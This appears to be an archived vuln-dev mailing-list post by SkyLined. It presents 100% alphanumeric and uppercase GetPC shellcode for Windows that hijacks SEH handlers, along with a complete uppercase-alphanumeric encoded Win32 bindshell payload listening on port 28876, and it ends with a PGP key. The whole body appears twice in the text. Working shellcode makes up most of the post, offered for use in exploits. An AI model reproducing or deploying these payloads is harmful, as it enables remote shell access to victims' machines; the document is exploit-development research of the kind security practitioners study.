There was a thread about writing ASCII GetPC code about a half year ago on
vuln-dev. I've been away a few months that's why I haven't written this mail
earlier.
I've developed 100% alphanumeric GetPC code for win NT/2K/XP based on work
by Costin Ionescu:
"VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089";
This code uses fs to get the current SEH address and overwrites it with a
new SEH. Then it causes an exception, passing execution to the new SEH. This
SEH can determine the location where the exception took place from the
information provided about the exception by the OS. It then transfers
execution back, passing the location of the code along in %ecx. Should work
100% of the time.
I've also developed a 100% UPPERCASE alphanumeric GetPC code:
"VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861
816"
;
This code will assume the start of the SEH chain is at the top of the stack
and you have not used more then 65536 bytes of stack. (SEH @ 0xXXXXffe4
where XXXX is taken from %esp) The resulting address SHOULD point to the
last SEH in the chain, which will be overwriten and then called by causing
an exeception, just like the "normal" SEH GetPC.
Because this code assumes you have not used more then 65535 bytes of stack
or fucked up %esp and because it hyjacks the LAST SEH, (if an earlier SEH
handles the exception, the code will not work!) this code will not work
under some conditions.
In addition to these GetPC codes, I've written an UPPERCASE alphanumeric
shellcode en-/decoder, source is attached. The decoder works on any IA32/x86
system, regardless of OS/SP unlike the GetPC code which is windows specific.
This will allow you to write OS/SP spanning uppercase alphanumeric
shellcodes like this w32 bindshell (port 28876):
VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A638618
16II
IIIIQZVTX630VX4A0B5HH0B20BBVX2BCBH4A2AC0ACTBCQB0ACAVX4Z8BCJOMNOASBLFFK8B
TBSK
HBTNPKHBWNAMJKHJ6JPJVN6NFBPB0JFCSDCPRFFJVGGCWDSOEFEKKA7GJJNPOJNFMBPBPB0I
XONI
HELA8NNB9A0BPBPFUJ6A0APBPBPKKDRMWKJM7JNLKBPBPB0ASBLBEBUBUB5BTBUBTB5KKHJE
EF3I
WJNHJBPB0BPI8HLACBLB5BEJVDPBPB7NLIHBNBULVB1B5HEKKAXFKNBPKJNLHB0BPB0ASBLB
5HUK
KCMLOJUKIJNNWBPBPBPJULFBQFUBEHUKKG4COH5HLJNNVBPB0BPJ6CVMFFVB0I8ANACKMB5B
EBUC
ECUJ6APA0BPB0CUCECECUCECECECECECULFF4I8HNB5EUCUCUCECUF5H5CUCUCEC4CEKTCEC
5A5C
EIXMOKKARBME0BMJNMRBPBPBPASBLJTKHFTFRFPKKCTKLMXOUJNNABPB0BPMUMEMUKKDQKFM
6BMJ
NOPB0BPBPA3BLBUIHMOKKIVMQD4LCJNB0BPBPBPHUGUK8EDN3K8FUE0JGAPLNDUK8DUB2APL
NACB
LACILATKXF3LXAPPNASOOALOLCQNJAPGLEHBLEWHOICOMEWLNLEKXLUF2APKNHFKHNPKTKHL
ENQA
PKNKXFPKXAPJNOUP5OOBNZ
Thanks:
Costin Ionescu for the idear behind w32 SEH GetPC.
HD Moore for the shellcodes and concepts at www.metasploit.com
Greets: 0dd, #netric, (K)(L)(F) for Suzan
Cheers,
SkyLined
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 8.0 - not licensed for commercial use: www.pgp.com
Comment: Berend-Jan Wever - skylined (at) edup.tudelft (dot) nl [email concealed]
There was a thread about writing ASCII GetPC code about a half year ago on
vuln-dev. I've been away a few months that's why I haven't written this mail
earlier.
I've developed 100% alphanumeric GetPC code for win NT/2K/XP based on work
by Costin Ionescu:
"VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089";
This code uses fs to get the current SEH address and overwrites it with a
new SEH. Then it causes an exception, passing execution to the new SEH. This
SEH can determine the location where the exception took place from the
information provided about the exception by the OS. It then transfers
execution back, passing the location of the code along in %ecx. Should work
100% of the time.
I've also developed a 100% UPPERCASE alphanumeric GetPC code:
"VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861
816"
;
This code will assume the start of the SEH chain is at the top of the stack
and you have not used more then 65536 bytes of stack. (SEH @ 0xXXXXffe4
where XXXX is taken from %esp) The resulting address SHOULD point to the
last SEH in the chain, which will be overwriten and then called by causing
an exeception, just like the "normal" SEH GetPC.
Because this code assumes you have not used more then 65535 bytes of stack
or fucked up %esp and because it hyjacks the LAST SEH, (if an earlier SEH
handles the exception, the code will not work!) this code will not work
under some conditions.
In addition to these GetPC codes, I've written an UPPERCASE alphanumeric
shellcode en-/decoder, source is attached. The decoder works on any IA32/x86
system, regardless of OS/SP unlike the GetPC code which is windows specific.
This will allow you to write OS/SP spanning uppercase alphanumeric
shellcodes like this w32 bindshell (port 28876):
VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A638618
16II
IIIIQZVTX630VX4A0B5HH0B20BBVX2BCBH4A2AC0ACTBCQB0ACAVX4Z8BCJOMNOASBLFFK8B
TBSK
HBTNPKHBWNAMJKHJ6JPJVN6NFBPB0JFCSDCPRFFJVGGCWDSOEFEKKA7GJJNPOJNFMBPBPB0I
XONI
HELA8NNB9A0BPBPFUJ6A0APBPBPKKDRMWKJM7JNLKBPBPB0ASBLBEBUBUB5BTBUBTB5KKHJE
EF3I
WJNHJBPB0BPI8HLACBLB5BEJVDPBPB7NLIHBNBULVB1B5HEKKAXFKNBPKJNLHB0BPB0ASBLB
5HUK
KCMLOJUKIJNNWBPBPBPJULFBQFUBEHUKKG4COH5HLJNNVBPB0BPJ6CVMFFVB0I8ANACKMB5B
EBUC
ECUJ6APA0BPB0CUCECECUCECECECECECULFF4I8HNB5EUCUCUCECUF5H5CUCUCEC4CEKTCEC
5A5C
EIXMOKKARBME0BMJNMRBPBPBPASBLJTKHFTFRFPKKCTKLMXOUJNNABPB0BPMUMEMUKKDQKFM
6BMJ
NOPB0BPBPA3BLBUIHMOKKIVMQD4LCJNB0BPBPBPHUGUK8EDN3K8FUE0JGAPLNDUK8DUB2APL
NACB
LACILATKXF3LXAPPNASOOALOLCQNJAPGLEHBLEWHOICOMEWLNLEKXLUF2APKNHFKHNPKTKHL
ENQA
PKNKXFPKXAPJNOUP5OOBNZ
Thanks:
Costin Ionescu for the idear behind w32 SEH GetPC.
HD Moore for the shellcodes and concepts at www.metasploit.com
Greets: 0dd, #netric, (K)(L)(F) for Suzan
Cheers,
SkyLined
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 8.0 - not licensed for commercial use: www.pgp.com
Comment: Berend-Jan Wever - skylined (at) edup.tudelft (dot) nl [email concealed]
mQGiBD//MyARBADnHLyg2lUBEddhdWAVBxovYU5PetLk2y3HZKguauHS6tT7sNPb
WR4JuRZ5G9uTkgS/JlVl8jhdvAfOhAsXnlSwfBljPSt7ylHkmG/0TUQV14+OVIks
joq80V2yGNT8oRGC/HMk6d20THXFsqiE8pLF5OVdcF0PpTP14OeavvWp2QCg/2Yb
nk1i1VSjOCmPudJ+7klQbI0D/3pRkXQofpYslG7hBaEndDOVFRo9rgF5D4cbmIo0
eH9LEtzHiB+Q1wgJ2CUxWQeYtqCE5upBOl5vwnlY86vH6QdxZ7JdOhyWU2bgbb+D
xZrWgE1LibVdqC6ow2NgmCTQhvnBVpuvrpfe50iohujCzzI4n8Vwolg4jQtCmsU/
2glaA/9vM9T09rlq0CMQnwI3o1WPuyaVd2RrODo8AScKmYkukiuOCF7HSB//hGOX
1HXkM+yRi7ZtGVuX2sY2wkjiZa1OUuL28I5FInJQxoS8FuMtlEY2vqVHcw01KL3O
NQPvVMNoieKM3hrLGUNTgvsiGEFZYzp908bvicGh3c1yrbo6XLQrQmVyZW5kLUph
biBXZXZlciA8c2t5bGluZWRAZWR1cC50dWRlbGZ0Lm5sPokAWAQQEQIAGAUCP/8z
IAgLCQgHAwIBCgIZAQUbAwAAAAAKCRDnF8rcdEbf3T07AKDQp2C/tLe5X8v1iUBa
TlEogOUvrQCg7SHA3QPk2f/6wnl9sqhADvXdS1W5Ag0EP/8zIBAIAPZCV7cIfwgX
cqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyD
vWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5
u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98
iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlA
GBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqr
ol7DVekyCzsAAgIIAPBwtE5Q5qtEuK/1a7rNrHvRTpgTJpw9P6B61TfGACiucXne
Xo28DbabGuD8yfiNaXTHKt9NAtfHxVTL1hFUIfK5dZ9o6FG4pJFZtXfjmGqoac6A
G2zBNWNAr26OqoEKrFohJyJ8rcIY+FKrH5axaBc9II5cxcQebWoFXU/tGq+4yVaZ
4669mfHBSfiThe4N1hlcrlcehxUe3QFZYmQHYClXpldY0t3/N71k5jd6a1NZ5j9Z
kfTBzXTtbKERt1mM9gptU4LjGJQFoNBw6dRj+IQc4wJG6nAmKaQpOwMdPnii8Kz1
i+MRkW92vt8bfcXqA38XcASI5iqKmQCSSYoBW0qJAEwEGBECAAwFAj//MyAFGwwA
AAAACgkQ5xfK3HRG391CBgCffzGf174a1bKMu4EbOFfrD9eyj90An14tyn0tPGg5
IlutbA2EL52jJYz2
=OpSl
-----END PGP PUBLIC KEY BLOCK-----
[ reply ]